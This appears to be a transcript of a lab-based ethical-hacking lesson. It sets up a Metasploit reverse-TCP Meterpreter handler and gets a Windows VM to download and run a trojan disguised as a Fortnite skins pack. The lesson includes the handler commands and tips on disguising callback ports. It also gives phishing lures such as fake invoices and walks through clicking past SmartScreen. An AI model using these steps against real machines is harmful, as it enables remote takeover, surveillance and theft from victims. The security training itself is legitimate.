Now it's time to infect our Windows 10 PC so that we can take remote control and do the command and control section. That's coming up for our next section. We have turned off our virus and threat protection settings and our Windows firewall. We have served up our virus on our web server in Kali. Now we just need to do a couple of things.

The first thing that we want to do every time we are trying to infect a remote machine for security testing, or for testing inside your organization, is listen for those infected PCs on our Kali Linux machine in Metasploit. So come back to your Metasploit shell, and if you've closed that, you can always reopen it just by running msfconsole or clicking on Exploitation Tools, Metasploit Framework, because we can start at this stage. Every time we want to reinfect using this same virus, as long as our IP address stays the same, we're going to be able to reinfect computers over and over and over again by using this same exploit. This one Windows virus can infect hundreds of PCs on your local area network or across the Internet. We're just going to use it in a very safe environment. But attackers can infect up to 65,000 computers at one time from just one of these Windows Meterpreter shells. So we're gonna use the exploit multi handler.
That can listen for incoming connections. We're going to set the payload to listen for those reverse TCP connections coming in. I'm going to show options just so you can see what we can set in there. We'll set our local host one more time so that our Windows Meterpreter shell will have a place to call back to on our Kali computer. So what I'm going to do is Ctrl+L to clear the screen, and I'm going to say use exploit/multi/handler.

This is a tool inside Metasploit that allows us to listen for or handle different virus payloads calling back into the Kali computer. We're going to set the payload to match that Windows reverse TCP. So we're gonna say set payload, and you can actually start typing out payload and use your Tab to autocomplete windows. I mean, Kali's Metasploit Framework will allow you to use autocomplete, so we can say windows/meterpreter/reverse_tcp and press Enter. And we can show options so we can see what kinds of options we can have here. We do need... there's a required local host function. So we've got to set the local host. That's who we want to call back into. Notice you can also change the port.
So if you wanna make it look like your DNS traffic on port 53, if you know some of the famous or some of the more common Internet ports out there, you can actually set a different port instead of 4444, which is the default here. You could set it to be port 443 so that it looks like secure web traffic, or port 80, so that it looks like a regular web server calling back. But we're going to set LHOST to 10.0. and use the rest of your IP address. .9.7 is the IP address on my machine, and you can run ip a if you don't remember your IP address on Kali.

And then all we have to do next... and there are a couple of things we could do next. We could say exploit -j -z. That would listen for multiple connections coming in in the background if we were exploiting a lot of machines. But I'm just going to run exploit, just e-x-p-l-o-i-t. And now we are listening for remote TCP connections coming back in. That reverse TCP handler will listen for my Windows PC to phone home after it gets infected. And so we've got this running on this device. We want to come back over to Windows, and we're going to surf to our Kali address and actually download and run that virus. So open up your web browser, and you can install Chrome or Firefox from inside your Windows VM
so it's a little more realistic. But a lot of people just use the default Edge browser that's built into Windows. We need to give it the address 10.0.9.7. And remember, /share is the share folder inside that Kali machine. And look at that, our Fortnite all skins .exe is right there, ready for somebody to serve up.

So the way this would work in a real-world attack is somebody would say, hey, download this new skins pack, you'll get all of the abilities that you want in Fortnite, all the skins, lots of other cool extras built in there. And they would click on it. Or somebody says, oh, I need you to look at this invoice, make sure you go download this file. Or you could just attach it to an email, attach the whole executable, even though a lot of executables get cut out of emails these days by spam filters. So you just send them the link and say, hey, go here and download the file and tell me what you think about this invoice, send me what you think about this candidate for us to hire, what's this funny set of videos, whatever it may be. And executable is not the only format that we can do in Metasploit. We can actually send a PDF or a movie file and actually infect someone's computer using some exploits for a vulnerable version of a PDF reader or of a media player as well.
So for the Fortnite all skins .exe, we will download that. And Windows is gonna try to warn us a little bit: what do you want to do with this? You don't want to run it, because we actually want to be able to run this multiple times, so I'm going to save it. Download it, and I will open the folder, and because we turned off our virus and threat protection settings, it should download OK, and we don't have to worry about the Windows firewall firing up.

So what I'm going to do is run Fortnite all skins .exe, and it's going to say, hey, this is an unrecognized app, don't run it. But if you click on More info, it'll let you run it anyway. So if you were sending this to somebody to test their ability to detect when something's going wrong, they've got a few hints. But if you tell them, I'll just click through More info and run anyway, there's a good chance that they'll run it. And if it's something they're interested in, there's a much better chance. Now, if you notice, back in our Kali machine, it looks like something started happening. And in fact, it did. It says that it opened up a reverse TCP handler on 10.0.9.9. That is our Windows computer.
And so now, if we want to run a couple of commands, we can actually take remote control of this Windows virtual machine. But it could be a laptop, a desktop or a Windows Surface tablet, and we would be able to run commands remotely on that machine through our Meterpreter shell. So if you were able to run this file and you see, after those four lines that we entered before, the exploit open up a session in Meterpreter, you are ready to move on to the next section, and we're gonna see how to command and control a Windows machine from Kali using this Trojan, this remote virus that we've created.

It's going to be a scary few lessons, because you can see that attackers can take control of the webcam, can take control of the keyboard, can take control of the mouse, just about anything that you can imagine, when you run an infected file. So be careful when you click these downloaded files. You can see already why it's dangerous to open something just because a friend or just because an email said to. But when we come back in the next section, we're going to see how to take full control of this remote PC, grab screenshots, keystrokes, and even turn on the webcam remotely. So come back for the next section and we'll see you there.